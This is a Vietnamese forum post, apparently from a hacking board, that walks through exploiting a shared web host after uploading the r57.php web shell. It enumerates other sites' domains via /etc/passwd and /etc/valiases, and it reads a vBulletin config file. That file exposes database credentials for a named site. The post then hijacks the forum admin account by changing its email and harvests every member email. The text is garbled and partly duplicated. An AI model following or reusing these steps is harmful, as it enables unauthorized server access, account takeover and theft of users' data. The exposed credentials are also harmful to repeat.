Admin
Well-Known Member
Staff member
Administrator
Giả sử đã up được con r57.php lên host,sau đó
và ra được các path của những victim khác trên cùng server:
ex: /home/user1
/home/user2
……………..
vấn đề là làm sao biết được domain của user1 và user2 đây?Tớ đã sử dụng
và
nhưng đều không thành công
kiểm tra các sites trên cùng server này
Code:
dùng thêm live hoặc công cụ tìm kiếm để search
live.com ip : ***.***.***.***
Code:
nó sẽ hiện ra…………………….. dạng như sau
Tiếp tục là local
Trên r57 shell dùng lệnh :
vd: sever nhactre
tiếp tục dùng lệnh ls vào thư mục 4rum/includes :
Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :
Ta có được các thông tin về database :
Trên r57 >>> Database >>> Run SQL query điền các thông tin tìm được vào :
Nhấn Execute .
Tiếp tục run SQL command :
Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :
Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin.
Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?
Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :
Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để ” thâu tóm ” toàn bộ email thành viên diễn đàn này .
Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :
Backup Database:
> /path/to/dump.sqlRestore Database:
Code:
cat /etc/passwdex: /home/user1
/home/user2
……………..
vấn đề là làm sao biết được domain của user1 và user2 đây?Tớ đã sử dụng
Code:
cat /var/cpanel/accounting.log
Code:
cat /etc/domainskiểm tra các sites trên cùng server này
Code:
Code:
ls -la /etc/valiaseslive.com ip : ***.***.***.***
Code:
Code:
cd /etc/vdomainaliases && ls -lia
cd /etc/vdomainaliases;ls -lia
cd /etc/valiases && ls -lia
cd /etc/valiases;ls -lia
Code:
819980 -rw-r–r– 1 flfounin nobody 0 Mar 17 13:34 fl4938r.com
4821034 -rw-r–r– 1 flanchen nobody 0 Mar 17 13:33 flanche.net
4826219 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.bangingscrew.com
4826135 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.com
4824052 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo-net.illusion-gfx.com
4824049 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo.net
4823877 -rw-r–r– 1 forgetbu nobody 0 Mar 17 13:33 forgetbuttons.comTrên r57 shell dùng lệnh :
vd: sever nhactre
Code:
ls /home/yeutruct/public_html/nhactre/tiếp tục dùng lệnh ls vào thư mục 4rum/includes :
Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :
Ta có được các thông tin về database :
Code:
$config['Database']['dbname'] = ‘yeutruct_nhactre’;$config['MasterServer']['username'] = ‘yeutruct_nhactre’;$config['MasterServer']['password'] = ‘mekiep’;Nhấn Execute .
Tiếp tục run SQL command :
Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :
Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin.
Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?
Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :
Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để ” thâu tóm ” toàn bộ email thành viên diễn đàn này .
Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :
Backup Database:
Code:
mysql -u username -p password dbname
Code:
mysql -u username -p password dbname < /path/to/dump.sql
